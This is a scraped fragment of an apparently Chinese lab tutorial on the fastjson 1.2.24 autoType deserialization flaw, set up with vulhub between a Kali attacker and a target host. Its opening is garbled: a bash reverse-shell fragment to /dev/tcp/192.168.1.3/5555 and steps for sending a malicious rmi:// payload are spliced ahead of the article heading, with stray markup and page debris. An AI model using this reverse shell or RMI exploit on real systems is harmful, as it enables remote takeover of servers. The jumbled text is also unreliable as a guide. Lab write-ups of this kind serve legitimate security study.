& /dev/tcp/192.168.1.3/5555 0>&1)1、kali(192.168.1.3)作为用户,访问目标机192.168.1.10:8090,并提交恶意数据rmi://192.168.1.3:6666。抓包修改请求方法为POST,最下面空一行添加{"name":"Cwillchris", "age":20},即可更新服务端的信息。_fas">
赞
踩
一 、漏洞描述
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
受影响版本
fastjson <= 1.2.24
实验所需:
目标机:192.168.1.10
攻击机:192.168.1.3
二、 环境搭建docker-compose,vulhub(在目标机192.168.1.10)
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。